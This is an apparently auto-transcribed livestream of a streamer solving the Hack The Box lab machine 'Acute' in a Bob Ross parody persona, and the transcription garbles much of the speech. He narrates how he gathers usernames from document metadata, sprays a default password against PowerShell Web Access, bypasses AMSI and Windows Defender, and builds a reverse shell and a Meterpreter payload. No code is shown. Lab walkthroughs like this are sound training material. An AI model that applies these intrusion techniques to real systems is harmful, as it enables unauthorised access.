some of this
A
belly.
hunter must hunt.
You give me some of this
Ocean
belly.
wave.
It's a good belly. That is a very good belly. Yes, I know. Yes, I know. With these feet. Yes, I know. Very lovely.
He thinks we will like it. And really, that's a good...
hunter must hunt.
Why is Trick like this? Oh, it never stops, friends. The grind continues. All right, let's get some water. Why is Al moaning when the malding hasn't even begun? It's been non-stop today, friends. Non-stop. Been trying to get this fucking project out the door. I can't even find time to work on it. People calling me, my boss calling me. Ugh. Reports to write, assessments to go on, meetings to sit in. Just non-stop. Non-stop! I'm amazed I'm here right now. All right, welcome everyone. Welcome once more to the whatever to
Ow.
the
Did you call Joe?
to
Joe
the
Mama. Got him.
It was almost as funny this
A
time.
hunter must hunt.
My goodness, John Doe Norris has summoned Alhaz Ross. Alhaz Ross has been summoned, my friends. How has the box dev been going? It's
At Al4ZR3D,
When
how has
I-
box dev been going? Can't wait.
when I am ready to tell you how it's been going, you will know how it's been going. That's the best way I can put that. 1 second. Let's go ahead and at least start up the VM. And then if we're gonna do Alhaz Ross. Okay. Today, by popular request, we're doing Acute. HacktheBox's Acute. Many people requested it. Maticus Maximus is lost in the lunacy. How many gifted subs? Freaking 10 more subs. Maticus, you psychopath. 187 subs in total. This is madness. Maticus, you're out of control, my friend. You've got to get somebody. You've got to. I honestly, you need somebody to take control of your finances. This is a lot of money to give to a cult leader on the internet. But thank you so much. You're so generous. So generous. Oreo Bite with the 100 Tiggle Biddies. Again, when I'm ready to tell you about how the CTF is going, you will know. The entire challenge is worked out. I know what the intended path to root is. And at the moment, I am debugging, adding safeguards, hardening the box against any sort of attack, because I know at least one of you is going to try to ruin it for everybody else. So I have to sit here and spend several extra days of dev time to try and harden the box, because I know people aren't going to I know you guys aren't going to behave yourselves. So I'm trying, like, I can't give you the example. I can't give you an example of what I'm most worried about. I'll leave instructions
I like
on
big molds, and I cannot lie.
I'll leave I'm taking a very calculated risk with this CTF, a very calculated risk to do this for you guys. And again, it is a risk for me, and I'm afraid that somebody's going to ruin it, and I'm never going to be able to do something like this again. I'm hoping that doesn't happen, but I'm worried it will, so I'm doing everything I can to prevent that. When I'm ready to tell you more about the CTF, you will know more about the CTF. Today, an Active Directory hard or insane machine using Cobalt Strike. We're not going to use Cobalt Strike. Number one, because I don't have it installed on this VM. And number two, because half of you endlessly bitch if I use Cobalt Strike for any reason on stream. So we're not going to use Cobalt Strike. If we end up needing something like a C2, we'll probably just use Meterpreter. Usually the only AV we run into is Windows Defender, and that's fairly easy for me to bypass. He's inventing what he used to... there are memes. There are memes built into this challenge. But I am encouraging you to expect the unexpected. The Privesk in particular, in my opinion, is a little bit spicy. The Privesk in particular, provided there isn't some unintended path that I failed to find, which I haven't ruled out yet. That's why I'm going to have someone play test it for me. The Privesk is a little bit spicy. It's a little bit spicy. And by that, I mean you're going to need to... It's very doable. It's very doable, but you're going to need to properly enumerate. There's a lot of puzzle pieces that need to be put together. How does that work since your job bought it for you? Do you just use the same license? Yeah, I just use the same license. They give you one to use for testing dev work in a home environment? No, I use the same license. I believe that Cobalt Strike licenses... you can install the client on as many machines as you want. I think you can only install the team server on one machine. GoPro with the 17-month re-indoctrination. Welcome back. I have to go get Alhaz Ross. John Doe Norris with the 16-month re-indoctrination. Jifram, 69 Tiggle Biddies. Nice. Mardo, thank you for the follow. Subterminal with the 9-month re-indoctrination into the cult. Welcome back. All right, let me go get Alhaz Ross. I get to take a day off, and my good friend / roommate, Alhaz Ross, will be taking over. So give me just 1 minute.
hunter must hunt.
Bye.
What are you doing, step bro?
Welcome once more, my children, my friends. Everyone deserves a friend. If nothing else, at least a tree. Everyone deserves a tree as a friend. Welcome, everyone. We're back here once more. Once more with our good friend Alhaz Ross, and we are here once
Don't
more
worry,
to learn.
stepsis. Alhaz
Above
Red will
all
get
else,
you
to
out
learn.
of that washer.
Because when you learn, you gain. Okay? We're going to go out on a few limbs today. But you know what? You go out on a limb, there's where the fruit is. Okay? I was out there on that limb. So today, we're going to be going out on a limb. Please, everyone, go to Google and search for someone in the years won't pay. You always still be so respectful. I do have to caution you. Alhazred has cautioned you today. We'll bring this up again when the CTF begins, but if there is evidence of impropriety, if there will be on the CTF, there will be tripwires set up. There will be monitoring systems in place to keep track of people on the machine, and if there is evidence of impropriety, if the rules are broken, the rules will be clearly outlined on the box itself. There will be a text document for you to read in the directory that you find yourself in. If there is evidence of impropriety, the entire CTF will be shut down immediately, and everyone will be canceled. Okay, it will all completely be canceled. I'm taking a calculated risk here, and if anybody tries to abuse my trust of my community,
this is the 1 point test. Will this return
not only
anything?
will the entire
Not
CTF
sure
be
what
shut
else
down,
to
but
type
I'm afraid, my friends, that I might not be able to do something like this again. So I'm asking you to please be kind when during the CTF. Treat it like a Hack the Box machine. Treat it like a Try Hack Me machine. And don't try to ruin me over it. Don't try to mock me or ruin or anything like that. Okay? Or again, my friends, have fun. We're out to have fun, but I will be watching you. I will indeed be watching you as you do the CTF. And if people step out of line, I'm afraid that I will have to shut everything down. Okay? I will have to shut everything down. Trees cover, they say we don't make mistakes. We make happy accidents. But being a dick on the machine is more than just a mistake. How are you going to be able to mold in that wig? We will not be molding. There will be no malding on this fine day, my friends.
Happy little accident.
No malding whatsoever. Today is a good day. And every day is a good day when you hack. Every day is a good day when you hack, my friends.
If the server
Okay?
shuts down because
Tell you
of
what,
threat actor that
Maticus
has nothing
Maximus.
to do with the CTF
Maticus
triggers,
Maximus,
the box
what did I
shuts
just say?
down.
What? Pray tell. What did I just say, Maticus Maximus? My friend, nobody will be malding today. Nobody will be malding. No one. Okay? Especially not your mom. Your mom is of all people in the world, Maticus Maximus's mother is the one who is least malding right now. Okay? We won't go into why, but that is the case. I assure you. Welcome, welcome, welcome.
A hunter must hunt.
Okay. Why don't we
here
just
for
get started
molding.
with Acute? I've heard that this one is a little bit spicy, so I want to go ahead and fire this one up, okay? I want to go ahead and fire this one up, get it started, just beat the devil out of it, find freedom in the command prompt, okay? We're going to find freedom in the command prompt this day. Okay, hack the box. Let's get going. Let's get going. Let's just beat the devil out of it, my friends. The Morph with the 4 months of Bezos initiation into the cult. Welcome back to the All Has Red team. Ghosts are spooky with the 300 Tiggle biddies. Thank you so much. That's so kind of you. Lawman with the 2 months. Welcome back to the All Has Red team, my friend. Thanks for supporting the stream. John Doe Norris, Oreo Bite, and Oreo Bite again. Thank you so much for those Tiggle biddies. Yusuf, thank you for the follow. My goodness. HacktheBox's login appears to have malfunctioned on me. We're going to get logged into HacktheBox and we're going to get started here. Don't worry. We're doing Acute today by popular demand. I've been told that this is a Windows Active Directory machine, and I'm told that it is a bit spicy. A bit spicy. So I hope, against hope, my friends, that Acute will not prove too obtuse for us, so to speak. If you like PowerShell, this is the box for you.
No, God! No, God, please, no! No! No!
Yeah, PowerShell is wonderful, my friends. PowerShell is my favorite language. Definitely doesn't have the worst syntax in the industry. It's fine. It's fine. We're all fine. We're all fine here now. Thank you. How are you? God, really? It's okay. It's all right. It's okay. It's okay. 740i killed my entire motivation to do the box in one sentence. It's fine. It's okay. It's okay. It's fine. We're gonna do it fine. It's gonna be okay. It's gonna be all right. Everyone, take deep breaths. Okay. Would you rather Java? Oh, Java any day. Java any day of the week. What's the beef with the syntax? Have you ever tried to use PowerShell? Have you ever Ginja Ninja, have you ever used PowerShell before in your life? First of all, it's the most verbose programming language that I know of. Like it's you know what? It's life. It's interesting. It's fun. Okay?
The question
And you know what they
remains,
say, the only
does
thing
Al has
worse
Ross
than
no
yellow
shadows
snow
pronouns?
is PowerShell. Okay? The only thing worse than yellow snow is PowerShell. They do say that. It is an ancient proverb. Where do they say that? I just did. And I'm sure they said it in ancient times as well. No. Stop. I don't want to use the... I don't want to use the old. I want to use the old Hack the Box. Old Hack the Box is better Hack the Box. Okay, we did monitors last time. We can probably just kill that sumbitch. Okay, let's just kill that. There we go. Let's remove that. There, that is. Alright, where's Acute? Where, pray tell, is it? There it is. Hard rated. Let's take a look at the box ahead of time. Let's take a look at the box. We see Acute, Windows, and we see that it is hard rated, 40 points. Seems like some people thought it was pretty spicy. User blood was in 1 hour and 20, and root blood was in 4 hours, so not so spicy. Okay, well, let's get it started. Let's do it. Let's beat the devil out of it. Let's get it. My main gripe with PowerShell, my friends, is that PowerShell is just very verbose. I don't like how verbose it is. And how much I have to type to do a very simple thing. It's getting better at that over time, but it's still not where I want it to be. Alright. Let me connect to the VPN. It is the correct VPN this time before some comedian in chat asks me if it's the correct VPN. No need. No need. Excellent. Okay. Happy little string. Indeed. Happy little secure strings. Happy little secure strings, happy little enter PS sessions. Only happy little enter PS sessions today, chat.
A hunter must hunt.
Alrighty, let's do it. Let's do it, my friends. Can we ping the box? Since it's Active Directory, we do expect that it will very likely be a domain controller, so it may take a minute to spin up. Let's go ahead and just give it a few minutes to spin up. Just give it a beat. Let's just give it a beat, my friends. But remember, no malding today. Absolutely no malding. This is a happy place. Little cultists live here and play.
What are you doing, step bro?
Let's talk to the box. Let's make friends with it. Okay, we're friends with the box. Okay, we have to coax it into letting us execute code on it. Okay, you have to be very nice. We got to be nice to the box. Happy thoughts. Indeed. Indeed. Only the happiest thoughts, my friends. Jifferham, thank you for that. One Tiggle Biddy. Zero Kieran has brought Windows PowerShell into the cult. Welcome, Windows PowerShell. Welcome. I don't like to say bad things about my viewers, but that's slightly harder now than it is usually. Okay? Slightly harder now. It sounds like we're grooming the box. Only happy grooming. Only happy grooming, okay? This is we just want to be friends. We can be very, very light. We happy painting, happy hacking, okay? Listen, if you want sad things, watch the news or code in PowerShell, okay? If you want sad things, okay? PowerShell is serving me well these days and saving me a headache at work. Oh, I'm sure it does. Like any programming language, you can practice in it and get good. I just don't particularly like its syntax. I don't like its syntax. Let's get StreamRaider starting. Again, we are giving the box just a few minutes to spin up. Usually with Active Directory domain controllers, it does need a couple of minutes. Okay, let's give it a few minutes. We don't want to start scanning and miss a port because the box wasn't up yet. I hope you have an unfortunate accident on the volcanic planet of Mustafar. I guess we'll exit the event. We're in Swords and Sweetery. Swords and Sweetery is the new event. PowerShell is getting better over time. They are improving it. It's open source now, for instance. It is better than it is better than DOS. Yes. For what that's worth, it is better than DOS. That we like James Cameron could not dive deep enough into the Mariana Trench to reach that bar that was just cleared. But that bar was cleared nonetheless. Okay, listen. We believe in PowerShell. It is able to clear that bar. Okay, it is able to clear that bar. Have you even ever used DOS? Yes, of course. Of course. Have you run dir $? The standard cmd.exe is a derivative of MS-DOS. And PowerShell is better than batch scripts. So there's that. Okay, where is what is the IP address of this? 10.10.11.145. Okay, excellent. We can ping the box. It's a good start. We've connected to the correct VPN. It's a good start, chat. Let's go ahead and start tmux. There we are. Excellent. Displaying Zool in Zork? You mean Zork? I used to play Zork in my middle school computer classes because it looked like I was doing work or something cool from a distance. When I was reading Ready Player One, I knew the answer to the second puzzle was Zork because I played Zork so much as a kid. I thought it was cool because it was text-based. And I was not incorrect. Zool, Ninja of the Nth Dimension? I'm afraid I have not played that. So let's begin, as we always do, with a good nmap, tech SV, tech SC, tech ON, prelim. We're going to change the name of the... Change the name to prelim because that name nmap is not really doing very well for us. We do see open port 443. So this is a bit unusual right off the bat. If this is an Active Directory machine, I'm expecting to see a lot of common ports open. What are some ports, chat, that I would expect to see if this was a Windows Active Directory domain controller? What are some ports? Yeah, 88, 53, 389, 636. All of those are ports that I would expect to see, but we don't see any of those. Interestingly, we see Microsoft HTTP API, which probably means there's not even, it says not found. That is very interesting. We do see an SSL certificate though, so let's go ahead and browse there and see if we can get some information. Okay, so we get a 404. Let's check the certificate. We do see the certificate does have some interesting ATS server CA, ATS server.acute.local, and DNS name. This is likely the NetBIOS domain name, I would imagine. Okay, so interesting. All right, so let's go ahead. Sudo vim etc hosts. Let's go ahead and add this to our etc hosts file. Welcome, Zonifer. Yeah, usually a domain controller will also be the DNS server on a domain. Not always, but it is common to see that in real life. So you would see TCP port 53 open. And I know what you're saying. Alhaz Ross. Alhaz Ross, my friend. DNS is a UDP protocol. Well, you'd be correct about that, friends. And good catch. However, DNS also does some things over TCP. Such as zone transfers. I encourage you to learn more about DNS to learn that DNS servers will usually have TCP port 53 open, in addition to UDP port 53. Let's go ahead and add these domain names. It's always a good idea to check out the SSL certificate whenever you get a chance. You get domain names if they're doing any kind of virtual host routing. This will give us a hint. Is it ATSS? Erver? Okay. If they're doing any kind of virtual host routing, okay. All right, we have a self-signed certificate, I believe, right? Unknown issuer. So it's signed by a certificate authority that the browser does not recognize, and it looks like we do indeed have a page here. Acute Health. Professional development training for healthcare professionals. Excellent. I want some professional development training. It seems like some of these are not loading properly. Let's make sure we skim over all of the information. There might be some stuff here. We see a placeholder telephone number. Primarily what we're looking for. Let's go ahead and view the page source. Is this some kind of custom thing, or is this a CMS? We are seeing references to that same domain. Acute. So it looks like there is an Acute directory. Let's start taking notes, okay? Let's start taking notes. Let's start taking some notes here. Just a little bit of notes. Just a dabble of notes. HacktheBox. Machines. Acute. Excellent. Happy little notes. Happy notes. Happy malds. So we do see... what was it? Acute? ATS server, excuse me. ATS server.acute.local. Yeah, interestingly, if this is an Active Directory machine, all we're seeing open is port 443. Very unusual. I have some guesses as to why that might be, but that's pretty uncommon to see on. It can still be it can still be a Windows domain environment. How do you guys think there might be a Windows domain environment involved here? Think about it a little bit. What are some things that we would expect to see if there's a Windows domain environment in play here? We see there's an Acute directory. Let's go ahead and start GoBuster. Zonifer is what I was getting at. Either Docker or some kind of containerization technology could make it possible to have a domain environment, but on only one machine. I don't think this is a network or anything. If so, there's probably one machine with containers running on top of it, or either containers or virtual machines. We can add TAC K to turn certificate verification off. There we are. Let's click around a little bit here. We see that some of the graphics, interestingly, are not properly loading. Inquiry. Acute Resource Center. Ah. What have we here, chat? So this is one thing that you want to make sure to look for in networks. Any indication, like especially if you're poking at a external infrastructure, you want to start picking up some names so that we can potentially extrapolate usernames from them. If we can figure out their username, unfortunately they don't have crackmap exec here, or Kerberos available, but if Kerberos was available, I would try to here I would try to make some possible username. I would try to extrapolate their username. Like, is it Eileen.Wallace? Is it A.Wallace? Is it A. Wallace? Is it Eileen W? Like, what is their username scheme? Sorry, I'm just putting all this in my notes. I'm just trying to take real good notes today. Eileen Wallace, Charlotte Hall, Evan Davies, Lewan Monks, if someone knows how to pronounce that, and I'd be happy to be corrected, and Lois Hopkins. What is the tool you use? Name Mash is the tool I use for that. Thank you, Anthony J.A. I've used it before. In this case, I'm probably not going to bother with it just yet because we don't see Kerberos open on the box. Unless it's running on some weird port, which is very unusual. We don't see any ports open except for 443 at this time. So, what is this? Starter forms. Ooh, a document. I would love a document. Thank you, my friend. What a very nice website. What a nice website, chat. A nice document. Let's find out what that's about. I cannot type, apparently. New starter checklist. Splendid. Do I still have... I'm wondering if I still have... HacktheBox. Acute. If I still have LibreOffice on here, or OpenOffice, whichever one I downloaded that one time. I don't recall removing it, so it's possible it will open. Oh, nope, this is an archived utility, so I'm going to need OpenOffice. I must have uninstalled it before. one of the guys at work had a 49-inch monitor. That's crazy, dude. That is nutty. How do... Let's just find out how to install OpenOffice. LibreOffice would probably also work. You're kidding me, there's no APT? That's frustrating. Alrighty, full installation Linux 64-bit. Seems reasonable. Okay, that is downloading. God. Okay, fine. Apparently we have to go through a whole rigmarole. But that is fine. I'm no molding today, chat. Just unzip it and read the text. I don't want to read XML. That'll be even worse. We can do, however, we can run exiftool. See if there's any information. Any usernames. University of Marvel. Any usernames? Oh, shoot. I was hoping for a username. We have F Castle. Perfect. F Castle. Excellent. So what does that mean, chat? Not only do we know about F Castle, but we also know about A Wallace. We know what their username schema is now. So it's A Wallace. Charlotte C Hall. E Davies. I Monks. J Morgan. Very likely it's like this. L Hopkins. And of course we have F Castle. Spectacular. Okay. All right, let's just follow these instructions. It wants us to fucking tar. Okay. CD ENUS. CD Debs. And we are not in Debs. RPMs? Did I download the wrong thing? I think I likely downloaded the wrong thing. Dude, really? Okay.
Hey, listen!
ENGB instead of ENUS. Boy, do I love this software. Jesus Christ. I don't have an ENGB. I have an ENUS. Perhaps I downloaded the wrong thing. Great. Let's see. ENUS. Yeah, this is the RBM. Can I get the Deb version? RPM Deb. Here we go. ENUS. Okay. All right, let's download. Sorry about that. I wasn't paying attention before. LibreOffice in Kali repo. Well, I looked for it and I got like a million things. I'm not gonna. And this is what I got when I Googled it. I tried this. I tried that. Okay, well. I don't like this software because it has so much overhead. LibreOffice. Oh, I did try OpenOffice. You're right. Oh well, as long as LibreOffice works. Oh God. Oh my goodness, my friends. As fun as the wig is, it really sucks to wear it. Breaking character for just 1 minute. It really sucks wearing this wig. It's too small for my head and it cuts off the circulation to my scalp. Alrighty. Only takes like 40 minutes to install. That's good. There's a reason that I removed this last time. It's so much freaking crap. I don't want it. Okay. Open it up. Let's hope it reads it properly. Looks okay. Excellent. No molds. No molding required. This, an acute induction checklist for new starters. Excellent. I'm a new starter. Staff induction pages can be found at this page. Let's go ahead and make a note of that. Okay. There's a staff directory. And there's a staff induction directory. Definitely going to want to take a look at those. But there is so much information here. We love information, chat. Information is our favorite. Oh, it looks like I accidentally... Okay. Induction pack. Their usernames. Induction. Conduct new starter. Induction for okay. Workspace is ready. Obtain a U card and computer account. What is a U card? Is that something? Are we going to be dealing with? Dare I say it, chat? Dare I say it? Okay, I'm assuming it's not the University of Utah. U card. This appears to be a credit card. Well, this could be one of two things, chat. This could be one of two things. This could be an access card to the building. It could be an access badge, but it could indicate that there is smart card authentication in use. And we haven't seen any boxes around smart card authentication just yet, but what would come into play if smart card authentication is in use? What we're going to have to be playing with ADCS, Active Directory Certificate Services. So let's make sure to make a note of that. Perhaps some ADCS. Okay. Just, we don't know yet. We don't know yet. Let's just pay attention. Payroll, tour of the department. Muse, My Job, Google accounts. Ah. Password change. Need to change it from the default password 1. That will indeed make a fine addition to our collection. Lovely. So, right off the bat, what are you thinking we're going to want to do, chat? Right off the bat, my friends, what immediate attack vector comes to mind, my friends? What happy little hugs are you thinking about giving to the box? Yes, password spray. Password spray. Now, unfortunately, did we see any additional ports open? No, just 443, really. So we have nowhere to, we have to find a place to log in. There's no crackmap exec is going to be possible here at the moment. No Kerberos exploitation. We're not going to be able to password spray just yet. We will check out those links here in just a second. PSWA to highlight the restrictions set on the set. What is this? This has got to be something that's relevant. Let's put that into the notes. Let's make sure to pay attention. I feel like the box is definitely giving us a hint there. What is PSWA? PowerShell web access? We love that, chat. That's good.
This is where the fun begins.
PowerShell web access. The new to highlight the restrictions set on the sessions named DC Manage. Remote training. Lois is the only authorized personnel to change group membership. Contact Lois to have this approved and changed as required. Only Lois can become site admin. My goodness, Lois. My friend, I think we will be reaching out to Lois. I believe we will indeed be reaching out to Lois, chat. Lois seems like the person we're going to want to talk to. Lois is definitely a friend. Learning management system. And I think that's it. That's all. Did I miss anything? We got a reference to a password. We got something here about PowerShell web access. At least I assume that's what they mean. And we have something about Lois, who potentially has elevated permissions on the domain. Spectacular. Okay, so let's close that. So let's now visit those pages that we saw. Staff and staff induction. Not found. Not found. How about PSWA? No. PowerShell. No. Staff. PSWA. No. Try lowercase. It shouldn't matter. Windows is not case sensitive. It shouldn't matter. Windows typically is not case sensitive. Acute local. Well, this page doesn't. These pages don't seem to load, I think. There were more links at the end? Where? Oh, right here there's a link. Ah, excellent. Acute staff access. Ooh, sneaky. A hyperlink. Excellent. Nice. Good catch, chat. Acute staff access. It's just acute staff access from the root. Let's see if we get anything from that. We're off to the... Now, if only, chat, if only we had some usernames and a potential common password. If only we had some usernames and a common password. My goodness. Let's do Stream Raiders really quickly. We're just moving right along, chat. We're moving right along. Everyone gird your loins. We're going in hot. All raw. No rubber. As they say in the good book. Did Alhazard use a little too much Miracle Grow recently? Nope, this is my natural hair. I am not Alhazred. I am Alhaz Ross. I am his good friend and counter Malder. Alhaz Ross, Maticus Maximus with the most kills and GoPro with the most assists. There we go. Alrighty. So we do have password 1 exclamation point. Now we are going to need a computer name. Let's look at the Nmap scan. ATS server? Usually it says DNS ATS server. What about the Word document?
Like Al
Did
Haside show Bob
the Word document exif tool? Let's look at exif tool again. Last modified by Daniel. See, now why you gotta do that? Why you gotta give me the creator as Fcastle and then last modified by Daniel? Who, my brother in Christ, who, pray tell, is Daniel? Oh, right above that it says created. Okay, perfect. Yeah, that was a test, chat. That was a test on your enumeration capabilities. Yes, while I was making fun of the Daniel name. Perfect. Computer name. Excellent, chat. You passed. You passed the test. Username. We can try A. Wallace. No, we want L. Hopkins, ideally. Hopkins. Password. Let's see if good old Lois has used a bad password. Nope. Let's try J. Morgan. We're just going to try all these usernames one after another. We tried Lois first because she has elevated permissions, we believe. I. Monks. Okay. No. E. Davies. Up. Up.
Hackerman.
We're in, boys. We're in. We've made happy ingress into the machine. Welcome, everyone, to PowerShell Web Access. The glory of all of this wasted space on the screen. This 2016 technology that doesn't appear to have ever been updated. Let's do GCI. Because PowerShell's has to have, we have to notice that pressing enter is not sufficient. Pressing enter does not actually execute a command. Instead, oh wait, it actually does. Okay, well, fine. If it's not broken, don't fix it. If you don't call it, my brother in Christ, Zonifer. My brother in Cthulhu. Look at what, do you see? This appears, if this doesn't look broken to you, okay? Okay, nothing in there. Let's find out if we are. We did read about restrictions set on sessions named DC Manage. We did see something about that. Is there a constrained language mode? Where is... There it is. Let's see if we're in constrained language mode. Full language. Excellent. Excellent. No constrained language. You're acting strange. Where's the real malding one? My friend. My brother in Cthulhu. We are all one on this blessed day, my friends. Us and the squirrels and the trees were in harmony with nature and doing some happy little hacking. Okay? Some happy hacking. What is constrained language? Constrained language is a security feature in PowerShell that allows you to restrict a user's session to only core types. So you won't have access to the full functionality of PowerShell. It prevents PowerShell from doing malicious things in an ideal world. Anthony J.A. with the 100 Tiggle biddies and Jifran with the 1 Tiggle biddy. Mailing only, Mave WR, Peachy Buffalo, Ape, EM, MS DOS, and Les Prunes. Thank you for the follows. My goodness. Why is Bob Ross hacking me? Because Bob Ross hacks you every day, okay? He hacks into your happiness, okay? He's building you he's hacking you a happy little cloud, okay? You just downgrade to PowerShell version 2. More recent versions of Windows no longer have PowerShell v2 installed. Okay, so the first thing we need to know, what's our first thing that we maybe want to look at, chat? The first thing is maybe task list. I knew Bob Ross. Peachy Buffalo, you knew a splendid man. I hope wherever he is, he's still doing his happy painting. Alas, access denied. We don't get to list the tasks. That does make me sad. Let's try... Uh-oh. Uh-oh. Alas, we are up against that most persistent of adversaries, Windows Defender. So we're going to go ahead and do a quick AMSI bypass, a really quick, not very happy AMSI bypass. It is not very cash money of Windows Defender to place these restrictions on me. Not very cash money. So we will just do a happy little AMSI bypass. There we go. And now I bet you if we do $str equals AMSI init failed. Now this goes through without a problem because AMSI has been unhooked from the process, my friends. Does anybody have any questions about how that works? Does anybody have any questions about how that works, my friend? Any questions? C utils running. What? Is there something in seed? Dir? Utils. This is not a normal folder. What have we in here? What is in here, my friends? GCI tac hidden. We just have desktop INI. There's nothing in here. What do you mean a hidden file? Where did you get that command? I made it. Well, it is an obfuscated version of the AMSI init failed AMSI bypass string. It is a it is unusual. It is, now that I think about it, unusual to see desktop.ini anywhere but on the desktop. So it's probably okay to just go ahead and see what that is. Never mind. Windows Defender not a problem, really, is it? So at this point, chat, at this point, I'm going to resoundingly say that this sucks ass. This disaster, this abortion of a PowerShell web access. So instead, I'm going to just get a reverse shell. My coworker wrote this AMSI bypass in NIM. It will generate a new string every time. Oh, that's cool. So it's like you can also use AMSI.fail. You can also, this is a whole ass website here. You can just generate one and it'll generate an entire AMSI bypass for you. The one that I used up here is a custom AMSI bypass. So we actually didn't need this. I'm wondering why they gave us this directory, because you don't need it. I simply bypass AMSI and I can just run PowerShell. But I'm going to get a reverse shell. Okay. Now this is a simple PowerShell reverse shell, you'll note it is abhorrently long, and that is because PowerShell syntax is the worst ever. And there we go. We do get a connection. What's RL wrap? This sort of helps us interact with the command shell a little bit better. As you can see, it's going to give us up arrow and down arrow and so on. It just makes the shell a little bit more operative. Let's go ahead and run AMSI bypass again, because we are running in a new PowerShell. We are running in a new PowerShell prompt here, I think. Maybe not. Maybe we're not. We'll still run the bypass anyways. It cannot hurt to run the bypass again. There we go. Okay. So who am I? I am E. Davies. Who am I / priv? We see no interesting permissions there. Let us... where were my notes again? Go back to my notes. Let's take down... We have E. Davies. And we know his password is password1. A very strong password, if I have ever seen one. Jesus, you get your initial foothold so soon? Yeah, this one was fairly easy. It just kind of walked us there. Half of the time was just spent installing LibreOffice. Let's look in the user's directory. E. Davies. Okay. Okay, nothing.
Why are you the way that you are at Windows PowerShell?
It gives us access denied. So one quirk of this reverse shell is that we don't see errors. If you want to see errors, you have to like specifically invoke the $error variable, and you'll see that we get access denied when we call task list. Let's see. Can we run get process? I want to see what processes are running. That is weird. What is this, chat? What is WMI-PRVSE? It's not unusual to see this running, but why is it unusual in this instance? Why, my friends? Pray tell. Think about it. What does this process do? Usually. And what does it... Is there... Yes. How unusual, chat. What sticks out to you here, chat? What is unusual about this process list that you're seeing? Not PowerShell. No. This is probably just us. No, what's weird? Some of you active... What do you mean by that, Embargo? Embargo DC, my friend, my brother in Cthulhu. What do you mean by that? Mm-hmm. What else? What does this mean? What is this process? Yeah, it means you typically, what's unusual about this is that you usually don't see this on, you usually do not see this on, on HacktheBox machines, someone has an interactive log-on session to this machine, which is very interesting. They even have Microsoft Edge open. We see MSMPENG. How very unusual. How very unusual. I wonder what they want us... That's gotta be... Like, can we do like a... I don't think you can do a hijack from here. Ooh, this is gonna be very spicy. Some happy little hacks. Yeah, I don't think we're gonna be able to do this because RDP is not open. The port for remote desktop is not open. If you run tscon.exe as the system user, that doesn't help us. Unlocks locked sessions. Connect any session. So we need to know the password, which if this, we don't know what user is running this. How interesting. I wonder how they want me to proceed. tscon probably is not... It looks like we can only do that in a GUI. Resuming a previously disconnected RDP session. The user is already logged in. If you try to RDP in, the other user... If you've ever RDP'd in as somebody while a user is already logged in, it asks that person, like, hey, someone else is trying to log in. Do you want to let them? And then they have to click yes. So... Q Winsta? What? I don't even know what that is. Okay. Let's try that out. E. Davies. So E. Davies currently is remote desktoped in. We have his password. Interesting. How very interesting. Very juicy. How very... That might be us. It is us. No, it's not us, as in... I thought you said this was remote desktop. Well, now you're just... It says we have a console session. We are E. Davies. We are E. Davies. It said remote desktop. Yeah, it says specifically remote desktop. Try the Q user command. Console again. It says that this is... It's the session name is console. How interesting. I am interested. Typically, the user is notified when someone else is trying to steal their session. With system permissions using Terminal Services Console, an adversary can hide it. We do not have system permissions, chat. We do not, unfortunately, have system permissions. Natasha. Are we in a domain environment? Your request will be processed for a domain acute.local. We... Is it $env? How do I view the environment variables? I fucking hate PowerShell so much. I tried $env. It did not work. It's set? What the fuck? Yeah, obviously it's the word set. Thank you, Microsoft. What the fuck is set? It didn't even work. Did this kill my shell? What the No molding. No molding, my friends. No molding. Are you kidding me? Okay. Goody. Alright, it's going so well already. It's alright. Happy little molds. Happy little chats. It's okay. It's alright. We're okay. I'm not upset. You're upset, chat. Don't get upset. It's okay. This makes perfect sense. Perfect. That's all I wanted this whole time. Okay. He is mentioned at it does say he is in a domain. User DNS domain is the env variable that holds the domain. What about the logon server? At ATS server. Interesting. So the domain controller. Now what is our host name? Acute PC01. So we are Acute PC01. And the DC is ATS server? Okay, important information is being gleaned. So we are probably in some kind of a virtual environment. Let me look in program files. What the fuck? Windows Defender ATP? They have ATP installed on here. Or at least this is the files for it.
A hunter must hunt.
I don't see any references to like VMware or anything. Let's look in the other program files. .NET. I don't see references to any. Very interesting. So we're in some kind of a virtual environment. Probably. Which is a bit unusual on Windows. Let's just mark all these down. So we are not system. So we cannot hijack his RDP session. What can we do? If we're a part, if he's in remote desktop, and we have his, and we are running as a part of his, what can we do? I mean, he's got Edge open. Why don't we just take a screenshot? Am I wrong? Why don't we just see what he's doing, chat? The easiest way to do that is going to be with Cobalt Strike has that ability, but we'll use MSF Venom. Interpreter reverse TCP. I don't think we need to encode it or anything like that. I think we're just good. We tried running netstat. We have not run netstat yet. Yes, Alhaz Ross is here today. Graphics. Alhaz Ross is here in all his glory. Nefarious with the 8 months of Prime. Welcome back to the Alhaz Red Team. Jiffaram with the 1 tiggle bitty. Gar with the raid. My goodness, I'm so sorry I missed the raid. I don't have my headphones on. I'm so sorry, Gar. Thank you so much for the very kind raid some time ago. Senpai Oliver, Algebra, Concept Chaos, Jai Mevx. Thank you for the follows. Now we do need to be in the utils directory because apparently this one is a Windows Defender exclusion. Anthony J.A. with the 100 Tiggle Biddies. My friend. My friend. We're doing some happy little hacking. You too can paint almighty pictures, chat. Hack almighty hacks. Okay. Did I mess up? Unable to connect. 10, 10, 14, 30? Can I not reach my server? Oh, I'm on the wrong port. No, that's the correct port. Cannot connect to the remote server. Oh, I'm listening on port 8443. How silly of me. That would be the problem. Okay, Cthulhu.exe. Let's go ahead and MSFDB run.
What are you doing, step bro?
Maticus Maximus, my brother, my friend. We are making love to this box right now, okay? We are loving on Acute PC01. Okay, we're giving it... Yes, I know. Hi, honey. Oh, yes. Oh, I know. You're just gonna be down there and yell until I pick you up. Okay, quick long cat in the chat. Quick long cat. Long cat.
What are you doing, step bro?
